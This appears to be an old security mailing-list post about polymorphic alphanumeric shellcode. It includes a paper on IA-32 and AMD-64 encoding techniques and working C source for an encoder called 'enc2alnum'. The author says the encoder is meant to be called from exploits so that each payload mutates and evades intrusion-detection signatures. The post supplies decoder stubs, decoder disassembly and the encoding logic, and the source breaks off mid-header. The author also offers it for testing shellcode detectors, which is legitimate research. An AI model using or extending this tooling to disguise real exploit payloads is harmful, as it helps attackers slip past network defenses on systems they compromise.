On Polymorphic Evasion ---------------------- === Addendum Thanks for pointing out the attachment was stripped. I'll include it below. Grep "===" for each file. Sorry about the wrapping and that stuff, if u want a zip/tgz of it then just email me. It is meant to be used in API fashion from an exploit to modify the shellcode each time it is run. Entry point is char *Encode2Alnum(input_reg, OriginalShellcode, OriginalShellcodeLength, int Verbose) and it will return a alphanumerized morphed version of the original shellcode. If you call it repeatedly you'll see the actual payload will fully change each time but the stub less so.. it does change all variable parts, but there are parts of the decoder that are fixed (e.g., the longest string is "A3A7A2B70B7B"). The solution is to add variable size alphanumeric NOPs as discussed in polymorph_alnum.txt below, but this step was never implemented. It its current form it will only work on Windows but of course it is trivial to change it to work on Unix if u remove windows.h and add typedefs for DWORD/BYTE/etc === Original post Cool. I will also add to the discussion with an alphanumeric version written with two others for experimentation, though it is limited in it doesn't vary the length of the decoder stubs or encoded shellcode. spoonm is doing a separate version--I think based on Berend's alpha--that will. Also, I did not test it against any of the different shellcode detectors like Fnord, so I would be curious to know if anyone tries. IMO "as to whether the detection of polymorphic shellcode was indeed an appropriate component of an IDS", I think there is enough prior art on it that it's not really a big deal to publish or discuss code implementing it. It most likely better to have a variety of generators to test the effectiveness of a shellcode detector. I added a small blurb on addtional options for OS-independence with alphanumeric shellcode for IA-32e/AMD-64 since it adds the new RIP-relative addressing. === enc2alnum/polymorph_alnum.txt Applying Polymorphism to Alphanumeric IA-32/IA-32e/AMD-64 Shellcode Matt Conover Rix (rix 2001) should be credited with being the pioneer of IA32 alphanumeric shellcode and showing it is possible. His Phrack article was the first to demonstrate feasibility. What rix did could be more called a translator than an encoder. There was no fixed payload followed by a blob of encoded shellcode that needed to be decoded. In shellcode terms this was quite innovative but really blew up the shellcode size. The next major step occurred when someone--unfortunately I don't know who--came up with a decoder that would modify the last byte of the decoder using an XOR to create a JNZ instruction and do looped decoding. This was to my knowledge the first compact alphanumeric encoder to follow rix's original translator. Both this decoder and Berend-Jan Wever's alpha decoder (Wever 2004) are based on this technique. This makes the shellcode much more compact as well. The size of the encoded output shellcode is: EncoderSize + sizeof(OriginalShellcode) * 2. Thus, it roughly doubled the shellcode size--a vast improvement over the first generation. The main limitation is that it was stack overflow specific. It was assuming that the shellcode was called immediate following a ret (and thus [esp-4] contains the shellcodes address). Berend-Jan Wever earlier this year released an alphanumeric decoder which is now also being used in the metasploit framework. In my opinion, the main contribution of his encoder was the creation of an alphanumeric Windows-specific GetPC stub. It is using an XOR trick like the one demonstrated by Costin Ionescu (Ionescu 2003). Since that time he has made some other major contributions, primarily combining his alphanumeric decode with a Unicode decoder, thus creating the first alphanumeric Unicode decoder that I Know of The approach we took was entirely using stubs. The assumption was that in almost all exploitation cases, it would be possible to reference the decoder relative to a register. We created a stub to represent all registers, direct or indirect, with positive or negative offsets. For example, take the case of EAX. We have a stub for each of these cases: EAX EAX+offset EAX-offset [EAX] [EAX+offset] [EAX-offset] This is represented as: { EAX, EAXStub, PreEAXPositiveOffsetStub, INC_ECX, PostEAXPositiveOffsetStub, PreEAXNegativeOffsetStub, DEC_EAX, PostEAXNegativeOffsetStub, EAXIndirectStub, PreEAXIndirectPositiveOffsetStub, INC_ECX, PostEAXIndirectPositiveOffsetStub, PreEAXIndirectNegativeOffsetStub, DEC_EAX, PostEAXIndirectNegativeOffsetStub }, The structure to represent each register is: typedef struct _REG_STUB { BYTE RegType; BYTE *DirectStub; BYTE *PreDirectPositiveOffsetStub; BYTE DirectPositiveOffsetOpcode; BYTE *PostDirectPositiveOffsetStub; BYTE *PreDirectNegativeOffsetStub; BYTE DirectNegativeOffsetOpcode; BYTE *PostDirectNegativeOffsetStub; BYTE *IndirectStub; BYTE *PreIndirectPositiveOffsetStub; BYTE IndirectPositiveOffsetOpcode; BYTE *PostIndirectPositiveOffsetStub; BYTE *PreIndirectNegativeOffsetStub; BYTE IndirectNegativeOffsetOpcode; BYTE *PostIndirectNegativeOffsetStub; } REG_STUB; These are the stubs for eax: BYTE EAXStub[] = "P"; // push eax BYTE EAXIndirectStub[] = "Ph!!!!X*****P*a30VX5!!!!P"; BYTE PreEAXPositiveOffsetStub[] = "PY"; // inc eax is not possible, so do push eax; pop ecx BYTE PostEAXPositiveOffsetStub[] = "Q"; // do push ecx BYTE PreEAXNegativeOffsetStub[] = ""; BYTE PostEAXNegativeOffsetStub[] = "P"; BYTE PreEAXIndirectPositiveOffsetStub[] = "PY"; // inc eax is not possible, so do push eax; pop ecx BYTE PostEAXIndirectPositiveOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; // do same as ecx case BYTE PreEAXIndirectNegativeOffsetStub[] = ""; BYTE PostEAXIndirectNegativeOffsetStub[] = "Ph!!!!X*****P*a30VX5!!!!P"; Note: the remainder of the stubs is in the appendix The only limitation here is that offset needs to be smaller than 60 or so to stay within the alphanumeric range. We then applied this to all registers (eax, ebx, ecx, edx, esi, edi, ebp, esp). So the only time this technique will not work is if the address of the decoder can not be described in terms of a register, or worse, it is unpredictable. In the case that it is difficult to predict or describe the location of the decoder relative to a register, a GetPC trick is necessary. There is one major problem, though: there is no known generic OS-independent GetPC. On Windows this could be done using the SEH ovewrite trick, which Berend-Jan Wever's alpha encoder was doing. The biggest problem is that it is costly in terms of size. The only alphanumeric opcodes to write an arbitrary address into an arbitrary address (e.g., like the 4-byte overwrites used in heap exploits) involves the following steps: 1. Initializing a register to 0 2. XOR'ing it with some 32-bit alphanumeric address (A1). 3. XOR'ing it again with some other 32-bit alphanumeric address (A2) such that A1 XOR A2 = WhereToWrite address 4. Repeating this process to get the WhatToWrite address 5. Clear out the contents at address [WhereToWrite] by doing do write memory type XORs 6. Set the contents of at address [WhereToWrite] = WhatToWrite using another XOR This is obviously a lot of work to get the decoder address and it doesn't work on anything other than Windows. +++ THE MERGING OF ALPHANUMERIC AND POLYMORPHIC ENCODING Since writing alphanumeric decoders by hand is tedious, the same encoder is likely going to be reused repeatedly. Consider these string from Berend-Jan Wever's alpha encoder: w32_SEH_GetPC_mixed_code: VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089 alpha_decoder_main_code1: VTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOM alpha_decoder_main_code2: VTX630VX4A0B4HH0B10BAVX2BBBH4A2AB0ABTBBQB0ABAVX4Z8BBJOM Now if you were to look at metasploit 2.0 framework developed by HD Moore and spoonm, you would find the following: VTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0ADTBDQB0ADAVX4Z8BDJOM The similarity between the two different is quite obvious. The reason? It takes time to write a good encoder, debug it, etc. Once a functional encoder is developed, it is unlikely to change much... even as it is passed among different shellcode writers. The likelihood of someone modifying the encoder is obviously inversely proportional to the complexity of the encoder. Therein lies the greatest weakness. Alphanumeric shellcode is afforded one primary advantage, however: the instruction set is difficult to distinguish from benign network traffic. Consider how difficult a task it is for a NIDS to recognize alphanumeric shellcode within the contents of a MIME via email or HTTP. It would be much too expensive to actually decode all the MIME traffic and then validate the decoded data is meaningful. Thus, a NIDS will rely on covering all known variants of the encoder. There are basically only three steps left in the evolution of alphanumeric shellcode on IA32 that I can see: 1. Combing alphanumeric encoders with other restricted encoders Here I mean making Unicode alphanumeric shellcode encoder, an alphanumeric shellcode that resembles sentences, etc. Berend-Jan Wever has already made many combinatinos of Unicode/alphanumeric encoders and is well on his way with the second, so I believe this step will soon be completed for the majority of useful cases. 2. An OS-independent GetPC trick This is one of the two fundamental problems of alphanumeric shellcode encoders. I do not believe anyone will ever discover an OS-independent GetPC trick for pure IA32. There are some new possibilities with the upcoming IA-32 with 64-bit extensions that will be discussed later. 3. Becoming polymorphic This is the other fundamental problem of alphanumeric shellcode encoders. First, the encoder cannot be fixed because this is easy to detect. Second, an input payload must result in a different encoded payload each time. Addressing these problems is the primary aim of this paper. +++ Making the encoder polymorphic Since alphanumeric shellcode can already masquerade well with mediums such as web traffic and email, the only real thing that needs to be addressed is to reduce the fixed part of the encoder to a size that is so small that it infeasible to use signature reliably. This was done in two steps. First, I added a pseudo-language to represent wildcard characters: RANDOMIZER g_Randomizers[] = { { '*', 0, FALSE, INDIRECT_CHARSET }, { '!', 3, TRUE, INDIRECT_CHARSET }, { 0, 0, FALSE, NULL } }; Here are a few examples. First the decoder itself: BYTE g_Decoder[] = "Zh!!!!X5!!!!H4C0B6RYkA7 at A3A7A2B70B7Bh!!!!X5!!!!4_8A7ub"; Second, a sample stub: BYTE EAXIndirectStub[] = "Ph!!!!X*****P*a30VX5!!!!P"; This is the structure: typedef struct _RANDOMIZER { BYTE RandomizeKey; DWORD Extra; BOOL ReplaceNextMatch; BYTE *CharacterSet; } RANDOMIZER; Here, the first field (RandomizeKey) is the special character and the last entry (CharacterSet) indicates the character set to replace the special character with. The middle two entries are bit more difficult to explain. The second field (Extra) indicates the subsequent bytes (excluding the matched RandomizeKey) that are included. This is used to randomize them in groups. The ReplaceNextMatch is used to replace the next occurence of the RandomizeKey with the same values. This is needed for XOR keys. Thus: push !!!! pop eax xor eax, !!!! Means that both !!!! will have the same value but that each individual '!' will have a different value. +++ Making randomized encodings As with cryptography, it is ideal to have ensure there is little visible correlation between input and output. First, encoding the same thing twice should look no similar than two different inputs. Second, repeating sequences should not be visibile in the output. Thus if the input shellcode had a NOP slide, this should appear no different than the rest of encoded shellcode. Similar to base64, converting from an input base of 8 bits (0x00-0xFF) to an output base of 6 bits (A-Za-z0-9) takes two bytes. The first step is to pick an XOR key that can be used to encode every possible input key. Next, find the number of ways to do encoding. Consider what the decoder does: DecodedByte = EncodedByte[0] * Key; DecodedByte ^= EncodedByte[1]; So it is a matter of solving the reverse equation: for (EncodedByte1 = '0'; EncodedByte1 <= 'z'; EncodedByte1++) { for (EncodedByte2 = '0'; EncodedByte2 <= 'z'; EncodedByte2++) OriginalByte2 = EncodedByte1 * Key; OriginalByte2 ^= EncodedByte2; if (OriginalByte == OriginalByte2) matched++; } EncodingCounts[OriginalByte] = matched; That is how the map is created. Then during the encoding, everytime the input byte is encountered, a random value less than the total number of possible encoding is chosen and that is used to select the encoding bytes. Thus, a sequence of "AAAAAA" would produce entirely differently characters for each 'A' (assuming there was more than one encoding). It would not be possible to recognize repeating patterns such as NOP slides from the output, for example. The final decoder looks like this: /* // edx points the beginning of the shellcode payload (stubs+decoder+shellcode) Z 01: pop edx // set eax to 0xffffffff h!!!! 02: push XORA X 03: pop eax 5!!!! 04: xor eax,XORA H 05: dec eax // change line 22 to jnz 4C 06: xor al,43h 0B6 07: xor byte ptr [edx+36h],al // set ecx to point to shellcode R 08: push edx Y 09: pop ecx kA7@ 10: imul eax,dword ptr [ecx+37h],KEY A 11: inc ecx 3A7 12: xor eax,dword ptr [ecx+37h] A 13: inc ecx 2B7 14: xor al,byte ptr [edx+37h] 0B7 15: xor byte ptr [edx+37h],al B 16: inc edx h!!!! 17: push XORB X 18: pop eax 5!!!! 19: xor eax,XORB 4_ 20: xor al,TERMINATOR 8A7 21: cmp byte ptr [ecx+37h],al ub 22: jnz _OriginalShellcode+5Eh // changed by lines 4 and 5 _ = terminator @ = key !!!! = XOR_VALUES */ Each stub is responsible for getting the address of the shellcode onto the stack. The first instruction of the decoder is to pop the address of the shellcode and then begin operating on it. +++ Adding NOPs Admittedly, this is still not good enough. There is still a fairly long and distinct string in the encoder: H4C0B6RYkA7 at A3A7A2B70B7Bh The solution here is to add random alphanumeric NOPs of varying length at random offsets in the encoder. The only generic IA-32 alphanumeric NOPs involve PUSH, POP, INC, and DEC (alphanumeric XOR requires a memory address): 1. push reg_a; pop reg_a 2. inc reg_a; dec reg_a; 3. push reg_a push reg_b pop reg_a pop reg_b push reg_a push reg_b pop reg_a pop reg_b 4. #3 but with an INC before the first set of PUSH instructions and DEC after the last set of POP instructions 5. #4 but with DEC/INC reversed +++ POSSIBILITIES WITH IA-32E AND OS-INDEPENDENT ALPHANUMERIC SHELLCODE AMD-64 and Intel's IA-32 with 64-bit extensions (hereafter referred to as IA-32e) adds 64-bit support to the IA-32 architecture. It is the same as IA-32 with a few additional opcodes, a new opcode prefix (called REX), additional 64-bit registers (RAX, RBX, RCX, RIP, RSI, RDI, etc.), and the ability to reference 64-bit addresses (using the REX prefix). Some opcodes implicitly use 64-bit addresses and by default the operand size is the same as IA-32. This makes it possible for most IA32 code to run without any problems. The 64-bit mode (also known as "long mode") is enabled from 32-bit protected mode by: 1. Enabling page address extensions (setting the PAE bit in CR4) 2. Setting CR3 to point to a page table with 64-bit page table entries (which must reside with the 4GB of memory) 3. Setting the LME bit in the EFER MSR (MSR 0xc0000080) There are two important operating modes. One is compability mode, where the processor works just like IA-32--so there is no reason to discuss this mode further. The newer mode is the 64-bit mode that enables the 64-bit address space. To be placed into 64-bit mode, the following steps msut be taken. Now, so far what I've said has little effect on writing shellcode. There is one MAJOR change, however: the creation of the RIP (64-bit instruction pointer) relative addressing mode. RIP-relative offsets (hereafter called RIP offset) are just like branch instructions. It is relative to the next instruction in memory. Thus [RIP+0] references the opcode of the next instruction. For non-alphanumeric shellcode, this is only a minor improvement. It eliminates the need to use a "call 0; pop reg" type tricks frees up a register. For alphanumeric shellcode this solves the bigger problem of having no OS-independent GetPC ONLY IF it is not a string operation being exploited. By this I mean, it needs to be possible to have more than one NUL byte occur in the shellcode. If this is not possible, then the RIP-relative addressing mode will probably not help much. More on this later. The REX prefix is a new opcode prefix which must come after any legacy IA-32 opcode prefixes. It is used to add various 64-bit extensions: [0] REX.B = adds 1-bit to base in (1) ModRM.rm, (2) SIB.base, and (3) opcode.reg for register opcodes with no ModRM byte [1] REX.X = adds 1-bit to SIB.index [2] REX.W = 64-bit operands [3] REX.R = adds 1 bit to ModRM.reg [4-7] Must be 0100 (4) The REX prefixes can thus range from 0x40-0x4f. All but one of them (0x40) is alphanumeric: 0x41 = 'A', ..., 0x4F = 'O'. The possible alphanumeric REX bytes are: REX.W = 01001xxx = 0x48-0x4f = H to O REX.R = 0100x1xx = 0x44-0x47, 0x4c-0x4f = D to G, L to O REX.X = 0100xx1x = 0x42, 0x43, 0x46, 0x47, 0x4a, 0x4b, 0x4e, 0x4f = B, C, F, G, J, K, N, O REX.B = 0100xxx1 = 0x41, 0x43, 0x45, 0x47, 0x49, 0x4b, 0x4d, 0x4f = A, C, E, G, I, K, M, O +++ The magic '5' The ModRM byte is broken into three fields: [mod = high 2 bits][reg = 3 bits][rm = low 3 bits] In IA-32 (or IA-32e in compatibility mod), ModRM.mod = 00 and ModRM.rm = 101 indicates the DS:Disp32 addressing mode. That means it is a 32-bit offset relative to address 0 in the data segment. For all x86 32-bit operating systems that I'm aware, the address space is flat, so this represents an absolute address. In IA-32e in 64-bit mode, DS:Disp32 has been replaced by RIP-relative addressing. Thus the only ModRM byte possibilities for RIP-relative addressing are 00reg101. There is just ONE alphanumeric character in this range: the magic 5. ASCII '5' = 0x35 = 00110101 Note that REX.R and REX.B have no physical affect on the ModRM byte since the additional bit is in the REX prefix Thus, '5' is always the only alphanumeric ModRM byte possible, regardless of the REX prefix (if any) So the ModRM byte is immediately followed by a 32-bit displacement: "5" Here opcode is an opcode type that is followed by a ModRM byte (not all do), '5' is the ModRM byte, and AABBCCDD is the 32-bit displacement (which should be all alphanumeric of course). Now we've reached the most appropriate time to discuss the problem with using RIP offsets for alphanumeric shellcode that I alluded to earlier. The only addressing mode that is relative to the instruction pointer uses 32-bit displacements. The limitation this causes greatly varies depending on whether or not it is possible to send multiple NUL bytes. For shellcode through strings (only a terminating NUL byte allowed): The RIP offset will be between 0x30303030-0x7a7a7a7a since the offset must not contain NULs (or else the string will be terminated) and non-alphanumeric characters. The question then is whether or not this provides any advantage over using the existing possibilities. So far as I can tell, the answer is no. To make use of such large offsets you have know the approximate location of the shellcode. If you already have this information available, you can just reference the location by absolute address through a register and XOR. For shellcode with multiple NUL bytes allowed: If the instruction set is alphanumeric characters plus an arbitrary number of NUL bytes, then RIP offsets can make things really interesting. It is then possible to construct useful RIP offsets. To do looping, the use of a conditional jump is necessary to decode all the encoded shellcode. This is done through self-modification. To do self-modification, the decoder previously needed to know its own address. When NUL bytes are allowed, this can be done cleanly with RIP offsets. The only instruction available to arbitrarily modify memory is XOR. These are the formats of XOR available: XOR [RIP+AABBCCDD], al 00110000 00110101 DDBBCCAA = "05DDBBCCAA" XOR [RIP+AABBCCDD], eax 00110001 00110101 DDBBCCAA = "15DDBBCCAA" XOR al,[RIP+AABBCCDD] 00110010 00110101 DDBBCCAA = "25DDBBCCAA" XOR eax, [RIP+AABBCCDD] 00110011 00110101 DDBBCCAA = "35DDBBCCAA" ^- opcode ^- ModRM ^- 32-bit displacement Note: the 32-bit displacement is written backwards in memory because IA32 is a little endian architecture So now lets look at what the encoder was previously doing to create the JNZ: // edx points the beginning of the shellcode payload (stubs+decoder+shellcode) Z 01: pop edx // set eax to 0xffffffff h!!!! push XORA X pop eax 5!!!! xor eax,XORA H dec eax // change line 22 to jnz 4C xor al,43h 0B6 xor byte ptr [edx+36h],al So the shellcode stubs were responsible for pushing the address of the decoder onto the stack. Once the address of the decoder is known, offset 0x36 of the decoder is set to JNZ. Using the new RIP relative addressing, the decoder can be changed to: // pop edx is no longer needed // set eax to 0xffffffff h!!!! push XORA X pop eax 5!!!! xor eax,XORA H dec eax // change line 22 to jnz 4C xor al,43h 056\0\0\0 xor byte ptr [RIP+36h],al Since it is no larger necessary to determine the address of the shellcode, the stubs can be removed and anything referencing [edx+off] in the decoder will be changed to [RIP+off]. It will make the shellcode larger since all RIP offsets are 32-bit displacements, but it will make the shellcode OS-independent. +++ New IA-32e NOPs 1. For certain types of instructions the REX prefix is ignored. For these cases, 0x41-0x4f can be used as NOPs. Some common shellcode cases are: POP reg, POP mem, PUSH imm8, PUSH imm32, PUSH reg, PUSH mem, PUSH reg, RET, CALL, JMP, Jcc (conditional jumps), LOOP, and LOOPcc. When using the REX prefix as a NOP for alphanumeric shellcode, the PUSH, POP, and Jcc instructions are usable. This was well covered in rix's paper. 2. Using the operand size prefix (0x66) with REX.W set (0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f) 3. The actual value of the REX prefix byte can be varied without changing the meaning for certain instructions. I'll call these REX NOPs. REX.R is ignored when (1) there is no ModRM byte (2) ModRM.reg does not specify a general purpose, XMM, control, or debug register. Note that for alphanumeric shellcode, only instructions involving a general purpose register are relevant. REX.X are ignored when there is SIB byte REX.B is ignored when there is no ModRM or SIB byte 4. Though it has no application to alphanumeric shellcode, some segment override prefixes are ignored in 64-bit mode: 0x26, 0x2E, 0x36, 0x3E (segment overrides for ES, CS, SS and DS, respectively) Here is the alphanumeric instruction set that can utilize the REX prefix (0x41-0x4f) as a NOP, sorted alphabetically: JA disp8 = "w" (any REX prefix) JAE disp8 = "s" (any REX prefix) JB disp8 = "r" (any REX prefix) JBE disp8 = "v" (any REX prefix) JNZ disp8 = "u" (any REX prefix) JNO disp8 = "q" (any REX prefix) JNS disp8 = "y" (any REX prefix) JO disp8 = "p" (any REX prefix) JPE disp8 = "z" (any REX prefix) JS disp8 = "x" (any REX prefix) JZ disp8 = "t" (any REX prefix) POP eax = "X" (REX.W and REX.R should not be set) POP ecx = "Y" (REX.W and REX.R should not be set) POP edx = "Z" (REX.W and REX.R should not be set) PUSH imm8 = "j" (any REX prefix) PUSH imm32 = "h" PUSH eax = "P" PUSH ebx = "S" PUSH ecx = "Q" PUSH edx = "R" PUSH esi = "V" PUSH edi = "W" PUSH ebp = "U" PUSH esp = "T" Note that for imm8, imm32, disp8, and disp32 all bytes need to be alphanumeric. The imm32 and disp32 are stored with the least signature byte first (""). When inserting a REX NOP in front of a particular instruction, the engine should: 1. First, never generate REX prefixes of 0x41-0x47 ('A' to 'G'). This will make cause problems in most cases. 2. Restrict the possible REX values depending on the instruction type. 3. Adjust the offsets in relative branch instructions. To account for the inserted REX NOPs. If the offset is negative, decrement the offset by the number of REX NOPs inserted before that location. If the offset is positive, increment the offset by the number of REX NOPs inserted after that location. +++ ACKNOWLEDGEMENTS Greets always to gera, oded, and noir. Kudos to rix, Berend-Jan Wever, spoonm, CLET, and the others that have/are raising the bar for alphanumeric decoders. +++ WORKS CITED CLET Team. Aug. 2003. Polymorphic Shellcode Engine. Phrack . Ionescu, Costin. 1 July 2003. Re: GetPC code (was: Shellcode from ASCII). Vuln-Dev rix. Aug. 2001. Writing ia32 alphanumeric shellcodes. Phrack . Wever, Berend-Jan. 28 Jan. 2001. Alphanumeric GetPC code. Vuln-Dev . === enc2alnum/enc2alnum.c // Encode2Alnum (polymorphic alphanumeric decoder/encoder) // Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth #include "enc2alnum.h" #define ENC2ALNUM_COPYRIGHT "enc2alnum: Copyright (C) 2003-2004,\nMatt Conover, Avri Schneider, Soren Macbeth\n\n" int reg_type; // eax, ebx, etc int reg_indirect; // if set to 1, use [reg]; else use reg int reg_offset; // if reg_negative is set, use reg-offset; else use reg+offset int reg_negative; void Encode2AlnumUsage() { fprintf(stderr, ENC2ALNUM_COPYRIGHT); fprintf(stderr, "ERROR in Encode2Alnum (invalid input_reg)\n\n"); fprintf(stderr, "input_reg must be one of the following:\n"); fprintf(stderr, " reg = the register points to the shellcode\n"); fprintf(stderr, "\tSupported registers are eax, ebx, ecx, edx, esi, edi, ebp, esp\n"); fprintf(stderr, " [reg] = reg points to a pointer to the shellcode\n"); fprintf(stderr, "\tSupported registers are the same as above\n"); fprintf(stderr, " reg+X\n"); fprintf(stderr, " reg-x\n"); fprintf(stderr, " [reg+X]\n"); fprintf(stderr, " [reg-x]\n\n\n"); fprintf(stderr, "\tenc2alnum [eax]\n"); fprintf(stderr, "Example - Assumes ecx-8 is the shellcode address:\n"); fprintf(stderr, "\tenc2alnum ecx-8\n"); } BOOL ParseShellcodeLocation(char *reg_input) { char *end_ptr, *orig_source, *source; #ifndef TESTING int i; BYTE a; #endif if (!reg_input) return FALSE; orig_source = source = strdup(reg_input); if (source[0] == '[') { source++; reg_indirect = 1; } if (toupper(source[0]) != 'E') goto abort; source++; source[0] = toupper(source[0]); source[1] = toupper(source[1]); if (strncmp(source, "AX", 2) == 0) reg_type = EAX; else if (strncmp(source, "BX", 2) == 0) reg_type = EBX; else if (strncmp(source, "CX", 2) == 0) reg_type = ECX; else if (strncmp(source, "DX", 2) == 0) reg_type = EDX; else if (strncmp(source, "SI", 2) == 0) reg_type = ESI; else if (strncmp(source, "DI", 2) == 0) reg_type = EDI; else if (strncmp(source, "SP", 2) == 0) reg_type = ESP; else if (strncmp(source, "BP", 2) == 0) reg_type = EBP; else goto abort; source += 2; if ((reg_indirect && *source == ']') || (!reg_indirect && !*source)) goto finished; if (*source == '-') reg_negative = 1; else if (*source == '+') reg_negative = 0; else goto abort; source++; for (end_ptr = source; *end_ptr && isdigit(*end_ptr); end_ptr++); if (reg_indirect && *end_ptr != ']') goto abort; else if (!reg_indirect && *end_ptr) goto abort; *end_ptr = '\0'; reg_offset = atoi(source); finished: free(orig_source); return TRUE; abort: if (orig_source) free(orig_source); Encode2AlnumUsage(); return FALSE; } void UpdateOffsets(BYTE *Decoder, DWORD StubLength) { BYTE OffsetA = JNZ_VALUEA + (BYTE)StubLength; BYTE OffsetB = JNZ_VALUEB + (BYTE)StubLength; Decoder[JNZ_OFFSETA] = OffsetA; Decoder[JNZ_OFFSETB_1] = OffsetB; Decoder[JNZ_OFFSETB_2] = OffsetB; Decoder[JNZ_OFFSETB_3] = OffsetB; Decoder[JNZ_OFFSETB_4] = OffsetB; Decoder[JNZ_OFFSETB_5] = OffsetB; } // For format of input_reg, see Encode2AlnumUsage // NOTE: the caller must free the return value BYTE *Encode2Alnum(char *input_reg, BYTE *OriginalShellcode, DWORD OriginalShellcodeLength, BOOL Verbose) { DWORD StubLength, DecoderLength; DWORD i, j, index = 0; BYTE EncodedByte[2]; BYTE *InStub = NULL; BOOL BadKey = TRUE; BYTE *EncodedShellcode; DWORD EncodedShellcodeLength; #ifdef TESTING BYTE OriginalByte; BYTE *DecodedShellcode; DWORD DecodedShellcodeLength; #endif if (!ParseShellcodeLocation(input_reg)) return NULL; srand(GetTickCount()); StubLength = GetStubLength(); DecoderLength = strlen(g_Decoder); EncodedShellcodeLength = StubLength + DecoderLength + (OriginalShellcodeLength)*2 + 1; EncodedShellcode = malloc(EncodedShellcodeLength+1); if (!EncodedShellcode) { printf("Error allocating %d bytes\n", EncodedShellcodeLength+1); return NULL; } while (BadKey) { memset(EncodedShellcode, 0, EncodedShellcodeLength+1); if (StubLength > 0 && !CopyStub(EncodedShellcode, StubLength)) return NULL; if (!RandomizeDecoder(g_Decoder, DecoderLength)) return NULL; UpdateOffsets(g_Decoder, StubLength); // TODO: remove // Copy decoder after stub memcpy(EncodedShellcode+StubLength, g_Decoder, DecoderLength); // Check stub and decoder for (i = 0; EncodedShellcode[i]; i++) { if (!isalnum(EncodedShellcode[i])) { fprintf(stderr, "ERROR: offset %d of stub+decoder != alphanumeric\n", i); assert(0); return NULL; } } memset(EncodingCounts, 0, 256); for (i = 0; i < 256; i++) ComputeEncodingCount((BYTE)i); index = strlen(EncodedShellcode); EncodedByte[0] = EncodedByte[1] = 0; for (i = 0, j = 0, BadKey = FALSE; i < OriginalShellcodeLength; i++, j += 2) { #ifdef TESTING OriginalByte = OriginalShellcode[i]; #endif if (!EncodeTo2Bytes(OriginalShellcode[i], EncodedByte)) { BadKey = TRUE; break; } assert(isalnum(EncodedByte[0]) && isalnum(EncodedByte[1])); EncodedShellcode[index+j] = EncodedByte[0]; EncodedShellcode[index+j+1] = EncodedByte[1]; #ifdef TESTING assert(DecodeToByte(EncodedByte) == OriginalByte); #endif } // If BadKey was not reset it will fall out of the loop } EncodedShellcode[index+j] = Terminator; assert(index+j+1 == EncodedShellcodeLength); if (Verbose) { printf("BYTE EncodedShellcode[] = // encoded %d bytes\n\t\"", EncodedShellcode, OriginalShellcodeLength); for (i = 0; i < EncodedShellcodeLength; i++) { printf("%c", (BYTE)EncodedShellcode[i]); if (!((i + 1) % 64)) printf("\"\n\t\""); } printf("\";\n\n"); } #ifndef TESTING // Check stub+decoder+encodedshellcode for (i = 0; EncodedShellcode[i]; i++) { if (!isalnum(EncodedShellcode[i])) { fprintf(stderr, "ERROR: EncodedShellcode[%d] = 0x%02x (not alphanumeric)\n", i, EncodedShellcode[i]); assert(0); return NULL; } } assert(i == EncodedShellcodeLength); #endif #ifdef TESTING TestStubs(EncodedShellcode); DecodedShellcodeLength = EncodedShellcodeLength - DecoderLength; DecodedShellcodeLength /= 2; if (Verbose) printf("\nDecoded %d bytes to %d bytes\n", EncodedShellcodeLength, DecodedShellcodeLength); assert(OriginalShellcodeLength == DecodedShellcodeLength); DecodedShellcode = (BYTE *)malloc(DecodedShellcodeLength+1); if (!DecodedShellcode) { printf("Failed to allocate %d bytes\n", DecodedShellcodeLength+1); return -1; } memset(DecodedShellcode, 0, DecodedShellcodeLength+1); memcpy(DecodedShellcode, EncodedShellcode+DecoderLength, DecodedShellcodeLength); if (Verbose) { printf("BYTE DecodedShellcode[%d] =\n\t\"", DecodedShellcodeLength); for (i = 0; i < DecodedShellcodeLength; i++) { printf("\\x%02x", (BYTE)DecodedShellcode[i]); if (!((i + 1) % 16)) printf("\"\n\t\""); } printf("\";\n"); } assert(DecodedShellcodeLength == OriginalShellcodeLength); assert(memcmp(DecodedShellcode, OriginalShellcode, OriginalShellcodeLength) == 0); free(DecodedShellcode); #endif return EncodedShellcode; } === enc2alnum/enc2alnum.h // Encode2Alnum (polymorphic alphanumeric decoder/encoder) // Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth #ifndef ENC2ALNUM_H #define ENC2ALNUM_H #include #include #include #include #include typedef struct _REG_STUB { BYTE RegType; BYTE *DirectStub; BYTE *PreDirectPositiveOffsetStub; BYTE DirectPositiveOffsetOpcode; BYTE *PostDirectPositiveOffsetStub; BYTE *PreDirectNegativeOffsetStub; BYTE DirectNegativeOffsetOpcode; BYTE *PostDirectNegativeOffsetStub; BYTE *IndirectStub; BYTE *PreIndirectPositiveOffsetStub; BYTE IndirectPositiveOffsetOpcode; BYTE *PostIndirectPositiveOffsetStub; BYTE *PreIndirectNegativeOffsetStub; BYTE IndirectNegativeOffsetOpcode; BYTE *PostIndirectNegativeOffsetStub; } REG_STUB; #define INVALID 0 #define HARDCODED 9 #define EAX 1 #define EBX 2 #define ECX 3 #define EDX 4 #define ESI 5 #define EDI 6 #define ESP 7 #define EBP 8 typedef struct _RANDOMIZER { BYTE RandomizeKey; DWORD Extra; // total size to randomize excluding RandomizeKey BOOL ReplaceNextMatch; // find the next RandomizeKey starting RandomizeKey+Extra // and repeat (used for XOR to 0 trick where the values must match) BYTE *CharacterSet; // must be null terminated } RANDOMIZER; #define RANDOM_ALNUM() ((rand() % 'z') + '0') #define ALNUM_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" #define INDIRECT_CHARSET "PQRSTUVW" #define KEY_OFFSET (strlen(g_Decoder)-31) #define TERMINATOR_OFFSET (strlen(g_Decoder)-6) #define KEY '@' // RandomizeKey for key #define TERMINATOR '_' // RandomizeKey for terminator #define JNZ_VALUEA 0x35 #define JNZ_VALUEB 0x36 #define JNZ_OFFSETA (strlen(g_Decoder)-37) #define JNZ_OFFSETB_1 (strlen(g_Decoder)-3) #define JNZ_OFFSETB_2 (strlen(g_Decoder)-20) #define JNZ_OFFSETB_3 (strlen(g_Decoder)-23) #define JNZ_OFFSETB_4 (strlen(g_Decoder)-27) #define JNZ_OFFSETB_5 (strlen(g_Decoder)-32) //////////////////////////////////////////////////////////////////////////// // Instructions #define INC_EBX 'C' #define INC_ECX 'A' #define 